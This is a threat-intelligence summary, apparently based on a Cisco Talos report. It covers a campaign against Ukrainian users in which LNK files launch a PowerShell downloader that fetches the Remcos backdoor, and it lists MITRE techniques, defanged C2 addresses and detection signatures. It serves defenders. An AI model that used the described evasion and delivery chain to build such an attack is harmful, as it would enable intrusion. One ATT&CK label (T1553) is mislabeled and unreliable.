Full Report
Cisco Talos is actively tracking an ongoing campaign, targeting users in Ukraine with malicious LNK files which run a PowerShell downloader since at least November 2024.
Analysis Summary
# Tool/Technique: Remcos Backdoor (Distributed via LNK files and PowerShell)
## Overview
This describes an active campaign targeting users in Ukraine, utilizing malicious LNK files to execute a PowerShell downloader, which subsequently fetches and executes the Remcos remote access backdoor. The campaign leverages themes related to the invasion of Ukraine for social engineering.
## Technical Details
- Type: Malware family (Remcos Backdoor), Technique (LNK Execution, DLL Side-loading)
- Platform: Windows (implied by LNK files, PowerShell, and Explorer.exe injection)
- Capabilities: Remote access, file execution, payload delivery, persistence via injection.
- First Seen: Campaign active since at least November 2024.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Likely method of delivery via ZIP)
- **TA0002 - Execution**
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0003 - Persistence**
- T1553 - Subvert Control Plane/System Firmware (**Implied via injection into Explorer.exe**)
- **TA0005 - Defense Evasion**
- T1036 - Masquerading
- T1036.005 - Match Legitimate Name or Location (Using decoy files)
- T1027 - Obfuscated Files or Information (Indirect execution attempt via `Get-Command`)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP used for payload download)
## Functionality
### Core Capabilities
- **Initial Delivery:** Malicious LNK files disguised as document files are distributed, often compressed in ZIP archives.
- **Execution Chain:** LNK file execution triggers a PowerShell downloader.
- **Payload Retrieval:** The PowerShell script contacts geo-fenced C2 servers (located in Russia and Germany) to download a second-stage ZIP file containing the Remcos binary.
- **Remcos Execution:** The Remcos payload is executed using DLL side-loading.
- **Process Injection:** The final Remcos binary injects itself into `explorer.exe`.
### Advanced Features
- **Anti-Detection Encoding:** PowerShell uses the `Get-Command` cmdlet to indirectly execute download/execution functions, potentially bypassing string-based AV detection.
- **Geo-fencing/Access Restriction:** C2 servers restrict access to files based on geography (Victims in Ukraine likely grant access; external testing received HTTP error 403).
- **Decoy Files:** A decoy file is displayed to disguise the compromise after infection.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: LNK files using Russian/Ukrainian names related to military coordination or troop movement (e.g., `...docx.lnk`, `...xlsx.lnk` referencing specific individuals or troop locations).
- Registry Keys: [Not provided in the context]
- Network Indicators:
- 146[.]185[.]233[.]96 (Used for C2 communication on port 6856)
- Other download servers: 146[.]185[.]233[.]96, 146[.]185[.]233[.]101, 146[.]185[.]239[.]45, 80[.]66[.]79[.]91, 80[.]66[.]79[.]195, 81[.]19[.]131[.]95, 80[.]66[.]79[.]159, 80[.]66[.]79[.]200, 80[.]66[.]79[.]155, 146[.]185[.]239[.]51, 146[.]185[.]233[.]90, 146[.]185[.]233[.]97.
- Behavioral Indicators: Execution chain starting from LNK file loading PowerShell, contacting known infrastructure, and injecting into `explorer.exe`.
## Associated Threat Actors
- Gamaredon (Assessed with medium confidence)
## Detection Methods
- Signature-based detection: Snort SIDs: 64707, 64708 (Snort 2), 301171 (Snort 3).
- Behavioral detection: Detecting unusual use of PowerShell triggered by LNK files, suspicious network connections to known C2 IPs, and injection into `explorer.exe`.
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- **Email Security:** Use Cisco Secure Email to block malicious email attachments.
- **Endpoint Protection:** Deploy Cisco Secure Endpoint to prevent malware execution.
- **Network Segmentation/Filtering:** Use Cisco Secure Firewall or Umbrella to block connections to known malicious IPs/domains associated with C2 infrastructure.
- **Network Analytics:** Utilize Cisco Secure Network/Cloud Analytics to profile and alert on process injection behavior.
- **Authentication:** Employ Cisco Duo for multi-factor authentication to limit access even if initial compromise occurs.
## Related Tools/Techniques
- Remcos Backdoor (The final payload)
- LNK file techniques used for initial execution.
- PowerShell for obfuscated downloading.